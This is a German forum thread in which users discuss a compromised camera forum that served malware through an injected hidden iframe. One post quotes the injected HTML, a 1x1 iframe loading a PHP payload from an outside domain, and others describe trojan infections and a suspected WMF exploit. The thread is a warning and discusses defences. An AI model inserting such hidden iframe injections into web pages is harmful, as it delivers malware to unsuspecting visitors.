[HolgerB]

Ich surfe mit Firefox. Auf der angesprochenen Seite ist ganz links oben ein winziges Frame zu sehen, in dem irgendeine php auf toolbardollars(dot)biz geladen werden soll.

Hat jemand ne Ahnung, um was es sich dabei handelt? Und wie das Frame da hin kommt?

Schöne Grüße, Holger

[joki]

Zitat:

Zitat von A2Freak

Holla die Waldfee, mein Virenscanner schreit auch Zeter und Mordio. Ich gehe über AOL rein.

Und ich bleib da schön draussen - testet Ihr mal alle Eure Virenscanner...

[yaku]

Zitat:

Zitat von Ditmar

Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg!

Na dann wirst Du, wie ich mitgelesen habe, wohl nach Rußland gehen müssen.
Von den Temperaturen bist Du ja schon etwas vorbereitet.

[XxJakeBluesxX]

Mit Opera 8.50 & Kaspersky Anti-Virus Personal habe ich meine Ruhe...

[ManniC]

Zitat:

Zitat von HolgerB

Und wie das Frame da hin kommt?

Ich schätze mal mit DHL & Freeway-Paketmarke

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:

Zitat:

<head>
<bugame src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
<title>Portal</title> .........

Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

[HolgerB]

Zitat:

Zitat von ManniC

Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Meiner offenbar auch. Gottseidank.

Zitat:

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

Schöne Grüße, Holger

[Bohne]

Hallo
ich war Mittag im Minolta Forum und dabei hat es mich voll erwischt der Virenscanner spielte verrückt und konnte weder desinfizieren noch in die Quarantäne verschieben . Der Rechner machte was er wollte, mal an dann gleich wieder aus, Desktop wurde erst grün dann blau und schwarz.
dannach ungefähr 7-8 Fehlermeldungen die so schnell kamen das ich nur noch rote Kreuze gesehen habe.
der Virenscanner hat dann 12 Viren und Trojaner in C:/Dokumente und Einstellungen gefunden . Teilweise konnte er sie unschädlich machen teilweise nicht. 7 Trojaner sind geblieben. Also System neu aufgesetzt und jetzt bin ich erst mal mit dem Gröbsten fertig.

Ps: Ich halte mich erst mal ein paar Tage von dort fern.
Muss wohl was mit WMF Files sein.

Also schön Vorsichtig

Gruß Thomas

[yaku]

Wäre es nicht eine Überlegung wert ob man die User in unserem Forum nicht per E-Mail benachrichtigt, wenn sich hier auch einmal soetwas einschleichen sollte.

[PauloG]

Zitat:

Zitat von Ditmar

hatte selber vor ein paar Wochen einen Trojaner auf dem Rechner, und große Mühe den wieder los zu werden. War Hartnäckig bis zum geht nicht mehr, hab mein ganzes System neu aufspielen müssen.
Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! Weinen

Vielleicht war der im System32-Ordner, dann stellt die Systemwiederherstellung, wenn aktiv(standardmäßig), den Parasiten nach dem Entfernen wieder her. System und Virenscanner spielen dann quasi Ping-Pong

[emundem164]

Zitat:

Zitat von ManniC

Zitat:

Ich schätze mal mit DHL & Freeway-Paketmarke

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:

Zitat:

Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

hmm.. hab grad auch ein wenig rumgespielt... das ganze scheint im firefox gewollt nicht zu klappen, denn der macht ja bekanntlich die wmf.dateien nicht direkt auf. wenn man die adv553.php im firefox öffnet, ist die nämlich praktisch leer.
im ie aber kann man schön den code-sehen wie wieder etliche iframes aufgemacht werden...
naja, der firmenrechner hier war zum glück gewappnet

gruss
michel